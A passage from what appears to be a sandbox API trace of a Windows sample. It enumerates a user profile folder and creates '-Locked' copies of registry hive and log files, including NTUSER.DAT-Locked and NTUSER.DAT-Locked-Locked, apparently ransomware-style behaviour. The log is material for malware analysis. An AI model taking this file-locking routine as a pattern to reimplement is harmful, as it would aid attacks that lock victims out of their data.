lpFilePart=0x0) returned 0x15 [0301.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af194) returned 1 [0301.839] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX", lpFilePart=0x0) returned 0x15 [0301.839] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\", nBufferLength=0x105, lpBuffer=0x1aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\", lpFilePart=0x0) returned 0x16 [0301.840] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\*.*", lpFindFileData=0x1aeebc | out: lpFindFileData=0x1aeebc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x32d4f49d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32d4f49d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0301.840] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x32d4f49d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32d4f49d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0301.841] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0301.841] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0301.841] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0301.841] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0301.842] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x32df1a0f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32df1a0f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0301.842] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3386e285, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3386e285, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0301.843] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0301.844] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0301.844] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0301.844] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0301.844] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb45c2764, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb45c2764, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0301.845] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0301.845] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0301.845] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3ce3dbd0, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf3d0952f, ftLastAccessTime.dwHighDateTime=0x1d7e768, ftLastWriteTime.dwLowDateTime=0xf3d0952f, ftLastWriteTime.dwHighDateTime=0x1d7e768, nFileSizeHigh=0x0, nFileSizeLow=0x180000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0301.845] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32d4f49d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32d4f49d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32d4f49d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT-Locked", cAlternateFileName="NTUSER~1.DAT")) returned 1 [0301.846] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x59400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0301.846] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x84000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0301.846] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63434853, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0301.846] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0301.847] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0301.847] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0301.847] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0301.847] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4766337, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4766337, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0301.847] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0301.848] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0301.848] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0301.848] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0301.848] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0301.849] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0301.849] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0301.850] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4bf8259, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4bf8259, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0301.851] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4bf8259, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4bf8259, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0301.851] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0301.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0301.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af160) returned 1 [0301.851] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT", lpFilePart=0x0) returned 0x20 [0301.851] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT-Locked", lpFilePart=0x0) returned 0x27 [0301.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0301.851] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\ntuser.dat-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0301.852] GetFileType (hFile=0x49c) returned 0x1 [0301.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0301.852] GetFileType (hFile=0x49c) returned 0x1 [0301.854] CloseHandle (hObject=0x49c) returned 1 [0301.854] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT-Locked", lpFilePart=0x0) returned 0x27 [0301.854] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT-Locked-Locked", lpFilePart=0x0) returned 0x2e [0301.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0301.854] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\ntuser.dat-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0301.855] GetFileType (hFile=0x49c) returned 0x1 [0301.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0301.855] GetFileType (hFile=0x49c) returned 0x1 [0301.857] CloseHandle (hObject=0x49c) returned 1 [0301.858] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG1", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG1", lpFilePart=0x0) returned 0x25 [0301.858] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG1-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG1-Locked", lpFilePart=0x0) returned 0x2c [0301.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0301.869] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG1-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\ntuser.dat.log1-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0301.869] GetFileType (hFile=0x49c) returned 0x1 [0301.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0301.870] GetFileType (hFile=0x49c) returned 0x1 [0301.872] CloseHandle (hObject=0x49c) returned 1 [0301.872] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG2", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG2", lpFilePart=0x0) returned 0x25 [0301.872] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG2-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG2-Locked", lpFilePart=0x0) returned 0x2c [0301.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0301.872] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\ntuser.dat.LOG2-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\ntuser.dat.log2-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0301.873] GetFileType (hFile=0x49c) returned 0x1 [0301.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0301.873] GetFileType (hFile=0x49c) returned 0x1 [0301.875] CloseHandle (hObject=0x49c) returned 1 [0301.875] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", lpFilePart=0x0) returned 0x4d [0301.875] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf-Locked", lpFilePart=0x0) returned 0x54 [0301.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0301.876] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tm.blf-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0301.876] GetFileType (hFile=0x49c) returned 0x1 [0301.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0301.876] GetFileType (hFile=0x49c) returned 0x1 [0301.878] CloseHandle (hObject=0x49c) returned 1 [0301.879] GetFullPathNameW (in: 